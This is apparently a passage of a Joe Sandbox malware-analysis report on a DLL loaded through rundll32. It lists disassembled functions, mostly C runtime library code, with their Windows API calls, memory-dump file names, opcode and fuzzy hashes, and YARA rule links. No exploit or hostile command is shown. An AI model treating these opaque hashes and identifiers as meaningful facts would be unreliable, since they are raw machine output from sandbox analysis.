              • GetLastError.KERNEL32(?,6F9F6961,00000000,00000001,?,?,?,6F9F0D58,?,00000000,00000000,?,?,?,6F9F1332,00000000), ref: 6F9F82F0
                • Part of subcall function 6F9F82B6: CloseHandle.KERNEL32(FFFFFFFE,6F9F8300,?,6F9F6961,00000000,00000001,?,?,?,6F9F0D58,?,00000000,00000000,?,?), ref: 6F9F82C6
              • ___initconout.LIBCMT ref: 6F9F8300
                • Part of subcall function 6F9F8278: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6F9F82A7,6F9F694E,?,?,6F9F0D58,?,00000000,00000000,?), ref: 6F9F828B
              • WriteConsoleW.KERNEL32(00000000,00000000,6F9EB4BB,00000000,?,6F9F6961,00000000,00000001,?,?,?,6F9F0D58,?,00000000,00000000,?), ref: 6F9F8315
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
              • String ID:
              • API String ID: 2744216297-0
              • Opcode ID: 30517a3b9dced8703cc48e78c43ef5504f0f25c1bab7312c22cb9a727bd8d13b
              • Instruction ID: a346450a17862f2d572a62213856802eb06effed2dd63387ee0b1c28c125e7fd
              • Opcode Fuzzy Hash: 30517a3b9dced8703cc48e78c43ef5504f0f25c1bab7312c22cb9a727bd8d13b
              • Instruction Fuzzy Hash: B8F01C3650AA15BBCF521F92DC0498D3F76FF0A7F1B088010FA1895164C632D8319F90
              Function 6F9E51CF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • EncodePointer.KERNEL32(00000000,?), ref: 6F9E51F4
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: EncodePointer
              • String ID: MOC$RCC
              • API String ID: 2118026453-2084237596
              • Opcode ID: 7f567eecfe678610b5cef0a2f79b4c9210ae199e2cb6a3cdc72f9ee9efced074
              • Instruction ID: 7181ef55fda0e5629bce5e0589bcddf746c721b565cb50da6ae142922ba2d515
              • Opcode Fuzzy Hash: 7f567eecfe678610b5cef0a2f79b4c9210ae199e2cb6a3cdc72f9ee9efced074
              • Instruction Fuzzy Hash: F3416832A00209AFCF02CFA8CC80AEE7BB9FF49314F148199F915A7291D735E950DB51
              Function 6F9EFD31 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • mydllmain.DLL1(00000FA0,-00000020,6F9F033F,6F9F033F,-00000020,00000FA0,00000000,00000000,?,?), ref: 6F9EFD61
              • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,6F9F033F,-00000020,00000FA0,00000000,00000000,?,?), ref: 6F9EFD71
              Strings
              • InitializeCriticalSectionEx, xrefs: 6F9EFD41
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: CountCriticalInitializeSectionSpinmydllmain
              • String ID: InitializeCriticalSectionEx
              • API String ID: 3077948437-3084827643
              • Opcode ID: c37533a60aea342b14aa58079f67d55610bf7ee06076d1c7079a28a23d2ba90f
              • Instruction ID: ebf86ec77776e403c7eab09ca27d9bd56e07b3ccbeb410d9829cd61b024731fc
              • Opcode Fuzzy Hash: c37533a60aea342b14aa58079f67d55610bf7ee06076d1c7079a28a23d2ba90f
              • Instruction Fuzzy Hash: F0E09231442519B7CF221F60DC04D9D3F26DF80779F008012FA2C552D0C732D8619BD0
              Function 6F9EFCEF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • mydllmain.DLL1(?,00000001,6F9E60D4,00000001,?,6F9EC1F7,?,?,?,?,?,00000000,6F9EAAAA,?,00000000,00000001), ref: 6F9EFD1C
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: mydllmain
              • String ID: FlsSetValue$ccs
              • API String ID: 979097349-2990521015
              • Opcode ID: 60e5aac3eda4c1bb2c9dc37df7179b4ab5dfff16b2bc96bc2c1489be20f95b11
              • Instruction ID: 2df782de406a8d0de655af6ac295f089cd7ee8a57e0e35dfae345fec7d5435b3
              • Opcode Fuzzy Hash: 60e5aac3eda4c1bb2c9dc37df7179b4ab5dfff16b2bc96bc2c1489be20f95b11
              • Instruction Fuzzy Hash: 93E0CD3254252973DA212F91AC08DD97F29DBC06B9B048063FF18962D0DA31D861D7D1
              Function 6F9EFC32 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22memoryCOMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: Allocmydllmain
              • String ID: FlsAlloc
              • API String ID: 2444374858-671089009
              • Opcode ID: 5d62a881fa14e11daa6522b692d7289d625f78807a1c4edb83c72af99d191f4f
              • Instruction ID: a7bd659a1ef523b56b66f01a8083a3fbed3ef9ff4d840c06664dea7a40f12a26
              • Opcode Fuzzy Hash: 5d62a881fa14e11daa6522b692d7289d625f78807a1c4edb83c72af99d191f4f
              • Instruction Fuzzy Hash: FBE0C23198692573CA322F54BD0899A7E19CFE1BBDB054023FF14953C19A20D81297E1